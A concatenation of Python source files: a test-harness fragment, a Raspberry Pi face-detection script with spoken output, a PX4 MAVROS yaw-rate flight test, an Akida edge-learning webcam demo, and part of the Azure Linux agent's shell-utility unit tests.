if not isinstance( x, TestHarness)])\
+ reduce( operator.add,
[len( x)
for x in self.failures
if isinstance( x, TestHarness)],
0)
def __str__( self):
from os import path
klass = self.__class__
return '\n'.join( ['LOGFILE is <%s>' % path.abspath( logfile().name),
'\nTEST HARNESS %s: %s error%s'
' out of %i tests:'
% (self.name, len( self) or 'SUCCESS - no',
1 < len( self) and 's' or '',
self.totalcount())]
+ [re.sub( '\n', '\n ',
isinstance( x, TestHarness)
and str( x) or apply( self.error2str, x))
for x in self.failures] + [''])
def error2str( self, fun, (exctype, excvalue, tb)):
import traceback
return '\n%s:\n <%s>\n' % (exctype, excvalue)\
+ ''.join( traceback.format_tb( tb.tb_next))
def totalcount( self):
return reduce( operator.add,
[x.totalcount() for x in self.dependents],
self.count)
def testcollect( globs,
matchfun = lambda x: re.match( 'test', x)):
from inspect import getfile, getsourcelines
result = [x[ 1]
for x in globs.items()
if callable( x[ 1]) and matchfun( x[ 0])]
result.sort( lambda x, y: cmp( (getfile( x), getsourcelines( x)[ -1]),
(getfile( y), getsourcelines( y)[ -1])))
return result
##def timerun( fun, timeout = None, endcallback = lambda : None):
## import threading
## print 'aaaa'
## subthread = threading.Thread( target = fun)
## subthread.setDaemon( 1)
## subthread.start()
## #outer = threading.Timer( timeout, sys.exit)
## print 'bbbb', timeout
## subthread.join( timeout)
## print 'cccc'
def prun( args = sys.argv[ 1:]):
    # win32 loses the stderr for subprocesses ... ?!
sys.stderr = sys.stdout
globs = {}
try:
for cmd in args:
exec cmd in globs
except SystemExit:
raise
except:
import traceback
traceback.print_stack()
traceback.print_exc()
sys.exit( 1)
|
facedetect.py
|
import setproctitle #Set process name to something easily killable
from threading import Thread
import cv2
import os
import subprocess #so I can run subprocesses in the background if I want
#import ConfigParser #To read the config file modified by menu.py
from subprocess import call #to call a process in the foreground
import csv #To make an array of the certainty and identity results so we can find the top matches
from operator import itemgetter
import time
class Facedetect:
def __init__(self, cam, cfg):
self.cam = cam
self.Config = cfg
self.faceframe = "/dev/shm/face_frame" #Signal to the FacialDetectionProcess that a frame is available
self.faceimg = "/dev/shm/face.jpg" #The frame
self.classify = "/dev/shm/face.txt" #position of face detected if detected
self.facetext = "/dev/shm/face_text" #FacialDetectionProcess creates this can be fetched
self.running = False
def start(self):
if (os.path.exists(self.faceframe)):
os.remove(self.faceframe)
if (os.path.exists(self.faceimg)):
os.remove(self.faceimg)
if (os.path.exists(self.facetext)):
os.remove(self.facetext)
if (os.path.exists(self.classify)):
os.remove(self.classify)
print "launching face detect analysis"
time.sleep(1)
subprocess.Popen(["sudo","python", "/home/pi/webcam_face_detection/cam.py","--face","/home/pi/webcam_face_detection/cascades/haarcascade_frontalface_default.xml"])
self.running = True
t = Thread(target=self.worker, args=())
t.start()
def worker(self):
while True:
if not self.running:
return
if (not os.path.exists(self.faceframe)):
print "face frame file not detected generating face.jpg"
res = cv2.resize(self.cam.read(), (640, 480), interpolation =cv2.INTER_AREA)
cv2.imwrite(self.faceimg, res)
os.mknod(self.faceframe)
continue
if (os.path.exists(self.facetext)):
print "reading report from face detect analysis"
time.sleep(0.5)
data = csv.reader(open('/dev/shm/face.txt', 'rb'), delimiter=",", quotechar='|')
locX, locY, H, W, xres, yres = [], [], [], [], [], []
for row in data:
locX.append(row[0])
locY.append(row[1])
H.append(row[2])
W.append(row[3])
xres.append(row[4])
yres.append(row[5])
print "x Location",locX
print "y Location",locY
print "rect height", H
print "rect width", W
print "xres ", xres
print "yres ",yres
locX = [int(i) for i in locX]
locX = locX[0]
locY = [int(i) for i in locY]
locY = locY[0]
H = [int(i) for i in H]
H = H[0]
W = [int(i) for i in W]
W = W[0]
xres = [int(i) for i in xres]
xres = xres[0]
yres = [int(i) for i in yres]
yres = yres[0]
centeredX = locX + (W * 0.5) # Center X of box
centeredY = locY + (H *0.5) #Center Y of box
print "centered X",centeredX
print "centered Y", centeredY
bottomthirdY = 0.33*yres #split total y resolution into thirds
midthirdY = 0.66*yres
topthirdY = yres
leftthirdX = 0.33*xres #split x resolution into thirds
midthirdX = 0.66*xres
rightthirdX = xres
#Now we can classify an x and y position based on grid locations in thirds
xstring = ""
ystring = ""
espeakstring = ""
if locX == 0 and locY == 0:
espeakstring = "" #This is what happens when no image gets processed, or no face is detected.
xstring = ""
ysrting = ""
else:
espeakstring = "face at" #if there are other values, there is a face detected
if centeredX > 0 and centeredX < leftthirdX:
xstring = "left"
elif centeredX > leftthirdX and centeredX < midthirdX:
xstring = "Center"
elif centeredX > midthirdX and centeredX < rightthirdX:
xstring = "right"
if centeredY > 0 and centeredY < bottomthirdY: #Note due to the x,y coord system in opencv the y axis thirds are reversed compared to many other systems
ystring = "Upper"
elif centeredY > bottomthirdY and centeredY < midthirdY:
ystring = "mid"
elif centeredY > midthirdY and centeredY < topthirdY:
ystring = "Lower"
espeakstring = espeakstring + xstring + ystring # read location and size
print "trying to read location and size"
espeak_process = subprocess.Popen(["espeak",espeakstring, "--stdout"], stdout=subprocess.PIPE)
aplay_process = subprocess.Popen(["aplay", "-D", "sysdefault"], stdin=espeak_process.stdout, stdout=subprocess.PIPE)
aplay_process.wait()#wait to speak location
call (["sudo","rm","-rf","/dev/shm/face.txt"]) #remove last run of facial detection info
os.remove(self.facetext)
def stop(self):
self.running = False
call (["sudo","killall","FacialDetectProcess"]) #Kills Facial Detection Process loop
|
yaw_test.py
|
#!/usr/bin/env python2
#***************************************************************************
#
# Copyright (c) 2020 PX4 Development Team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# 3. Neither the name PX4 nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
#***************************************************************************/
#
# @author Pedro Roque <padr@kth.se>
#
from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardYawrateTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending a Roll Pitch Yawrate Thrust (RPYrT)
as attitude setpoint.
For the test to be successful it needs to achieve a desired yawrate and height.
"""
def setUp(self):
super(MavrosOffboardYawrateTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
        # send setpoints in a separate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
# desired yawrate target
self.des_yawrate = 0.1
self.yawrate_tol = 0.02
def tearDown(self):
super(MavrosOffboardYawrateTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = self.local_position.pose.orientation
self.att.body_rate.x = 0
self.att.body_rate.y = 0
self.att.body_rate.z = self.des_yawrate
self.att.thrust = 0.59
self.att.type_mask = 3 # ignore roll and pitch rate
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
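    # Illustrative note (the bit values follow the MAVLink ATTITUDE_TARGET type_mask convention and are an
    # assumption here, not taken from this test itself): bit 1 ignores the body roll rate and bit 2 ignores
    # the body pitch rate, so the type_mask of 3 used in send_att keeps the yaw rate, thrust and attitude
    # fields active.
    IGNORE_BODY_ROLL_RATE = 1
    IGNORE_BODY_PITCH_RATE = 2
    assert (IGNORE_BODY_ROLL_RATE | IGNORE_BODY_PITCH_RATE) == 3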
#
# Test method
#
def test_attctl(self):
"""Test offboard yawrate control"""
# boundary to cross
# Stay leveled, go up, and test yawrate
boundary_x = 5
boundary_y = 5
boundary_z = 10
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
10, -1)
self.log_topic_vars()
self.set_arm(True, 5)
self.set_mode("OFFBOARD", 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | z: {2} , stay within x: {0} y: {1} \n and achieve {3} yawrate".
format(boundary_x, boundary_y, boundary_z, self.des_yawrate))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x < boundary_x and
self.local_position.pose.position.x > -boundary_x and
self.local_position.pose.position.y < boundary_y and
self.local_position.pose.position.y > -boundary_y and
self.local_position.pose.position.z > boundary_z and
abs(self.imu_data.angular_velocity.z - self.des_yawrate) < self.yawrate_tol):
rospy.loginfo("Test successful. Final altitude and yawrate achieved")
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to finish test | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} \n " \
" | current att qx: {3:.2f}, qy: {4:.2f}, qz: {5:.2f} qw: {6:.2f}, yr: {7:.2f}| timeout(seconds): {8}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z,
self.imu_data.orientation.x,
self.imu_data.orientation.y,
self.imu_data.orientation.z,
self.imu_data.orientation.w,
self.imu_data.angular_velocity.z,
timeout)))
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_yawrate_test',
MavrosOffboardYawrateTest)
|
akida_camera.py
|
import time
import os
import cv2
import threading
from imutils.video import VideoStream
from tensorflow.keras.preprocessing.image import img_to_array
import numpy as np
from pynput import keyboard
from akida_models import mobilenet_edge_imagenet_pretrained
from cnn2snn import convert
from akida import Model, FullyConnected
OUTPUT = False
OUTPUT_VID = "out.avi"
OUTPUT_FPS = 30
MODEL_FBZ = "models/edge_learning_example.fbz"
CAMERA_SRC = 0
INFERENCE_PER_SECOND = 1
TEXT_COLOUR = (190, 30, 255)
NUM_NEURONS_PER_CLASS = 1
NUM_WEIGHTS = 350
NUM_CLASSES = 10
FRAME_WIDTH = 640
FRAME_HEIGHT = 480
TARGET_WIDTH = 224
TARGET_HEIGHT = 224
NEURON_KEYS = [str(i) for i in range(10)]
SAVE_BUTTON = "s"
LABELS = {0: "Background"}
SAVED = []
SHOTS = {}
class Controls:
"""
Class to capture key presses to save/learn
"""
def __init__(self, inference):
self.listener = keyboard.Listener(
on_press=self.on_press, on_release=self.on_release
)
self.listener.start()
self.inference = inference
def on_press(self, key):
try:
if key.char in NEURON_KEYS:
print("learned class {}".format(int(key.char)))
self.inference.learn(int(key.char))
if key.char == SAVE_BUTTON:
print("saved model to {}".format(MODEL_FBZ))
self.inference.save()
except AttributeError:
pass
def on_release(self, key):
if key == keyboard.Key.esc:
return False
class Camera:
"""
Class to capture video feed from webcam
"""
def __init__(self):
self.stream = VideoStream(
src=CAMERA_SRC, resolution=(FRAME_WIDTH, FRAME_HEIGHT)
).start()
self.label = ""
self.shots = ""
self.text_display_timer = 0
if OUTPUT:
self.out = cv2.VideoWriter(
OUTPUT_VID,
cv2.VideoWriter_fourcc("M", "J", "P", "G"),
OUTPUT_FPS,
(FRAME_WIDTH, FRAME_HEIGHT),
)
def get_frame(self):
frame = cv2.resize(self.stream.read(), (TARGET_WIDTH, TARGET_HEIGHT))
return frame
def get_input_array(self):
frame = cv2.resize(self.stream.read(), (TARGET_WIDTH, TARGET_HEIGHT))
input_array = img_to_array(frame)
input_array = np.array([input_array], dtype="uint8")
return input_array
def show_frame(self):
frame = self.label_frame(self.stream.read())
if OUTPUT:
self.out.write(frame)
cv2.imshow("frame", frame)
key = cv2.waitKey(20) & 0xFF
def label_frame(self, frame):
frame = cv2.putText(
frame,
str(self.label),
(10, 40),
cv2.FONT_HERSHEY_SIMPLEX,
1.2,
TEXT_COLOUR,
1,
cv2.LINE_AA,
)
frame = cv2.putText(
frame,
str(self.shots),
(10, 75),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
TEXT_COLOUR,
1,
cv2.LINE_AA,
)
return frame
class Inference:
"""
Class to run inference over frames from the webcam
"""
def __init__(self, camera):
        # create a model if one doesn't exist
if not os.path.exists(MODEL_FBZ):
print("Initialising Akida model")
self.initialise()
        self.camera = camera
        # load the akida model before starting the worker, so the inference thread never sees a
        # partially initialised object
        self.model_ak = Model(filename=MODEL_FBZ)
        # run inference in a separate thread
        self.t1 = threading.Thread(target=self.infer)
        self.t1.start()
def initialise(self):
"""
Method to initialise an Akida model if one doesn't exist
"""
# fetch pretrained imagenet
model_keras = mobilenet_edge_imagenet_pretrained()
# convert it to an Akida model
model_ak = convert(model_keras)
        # remove the last layer of the network and replace it with an Akida learning layer
model_ak.pop_layer()
layer_fc = FullyConnected(
name="akida_edge_layer",
units=NUM_CLASSES * NUM_NEURONS_PER_CLASS,
activation=False,
)
# add learning layer to end of model
model_ak.add(layer_fc)
model_ak.compile(
num_weights=NUM_WEIGHTS, num_classes=NUM_CLASSES, learning_competition=0.1
)
# save new model
model_ak.save(MODEL_FBZ)
def infer(self):
while True:
            input_array = self.camera.get_input_array()
predictions = self.model_ak.predict(input_array, num_classes=NUM_CLASSES)
if predictions[0] in SAVED:
self.camera.label = LABELS.get(predictions[0], predictions[0])
self.camera.shots = "{} shot/s".format(SHOTS.get(predictions[0]))
time.sleep(1 / INFERENCE_PER_SECOND)
def learn(self, neuron):
if neuron not in SAVED:
SAVED.append(neuron)
SHOTS[neuron] = 1
else:
SHOTS[neuron] += 1
input_array = self.camera.get_input_array()
self.model_ak.fit(input_array, neuron)
self.camera.label = "Learned {}".format(LABELS.get(neuron, neuron))
def save(self):
self.model_ak.save(MODEL_FBZ)
camera = Camera()
inference = Inference(camera)
controls = Controls(inference)
while True:
camera.show_frame()
|
test_shell_util.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import signal
import tempfile
import threading
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
from tests.utils.miscellaneous_tools import wait_for, format_processes
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, _ = mock_logger.info.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any errors. Got: {0}".format(mock_logger.error.call_args_list))
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
# R0904: Too many public methods (24/20) -- disabled: each method is a unit test
class RunCommandTestCase(AgentTestCase): # pylint: disable=R0904
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
        #
        # The test pipe splits the output of "ls" into lines and then greps for "."
        #
        # Sample output of "ls -ld .":
        # drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
        #
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
        command_input = b'TEST BYTES'
        output = shellutil.run_command(["cat"], input=command_input)
        self.assertEqual(output, command_input.decode(), "The command did not process its input correctly; the output should match the (decoded) input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
# R0912: Too many branches (13/12) (too-many-branches) -- Disabled: Branches are sequential
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self): # pylint:disable=R0912
        # The child processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
